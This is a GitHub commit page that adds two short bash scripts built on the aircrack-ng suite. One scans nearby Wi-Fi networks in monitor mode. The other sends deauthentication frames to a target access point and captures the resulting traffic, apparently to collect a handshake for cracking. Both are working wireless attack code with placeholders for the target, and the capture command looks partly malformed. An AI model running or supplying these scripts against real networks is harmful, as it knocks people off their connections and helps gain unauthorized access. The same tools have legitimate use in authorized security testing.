Skip to content
Permalink
Browse files
Add files via upload
Uploaded scripts
  • Loading branch information
colli168 committed Mar 29, 2021
1 parent 4625e06 commit 1f0593bb6a3ba2792d8648176978fa68e2d953b2
Show file tree
Hide file tree
Showing 2 changed files with 10 additions and 0 deletions.
@@ -0,0 +1,5 @@
#!/usr/bin/bash
airmon-ng start wlan1 6
timeout 30 airodump-ng --write networks --output-format csv wlan1mon
airmon-ng stop wlan1mon
systemctl start NetworkManager
@@ -0,0 +1,5 @@
#!/usr/bin/bash
airmon-ng start wlan1 6
aireplay-ng --deauth 5 -a [Network SSID here] wlan1mon && timeout 75s airodump-ng -c --bssid [Network SSID here] -w packets wlan1mon
airmon-ng stop wlan1mon
reboot

0 comments on commit 1f0593b

Please sign in to comment.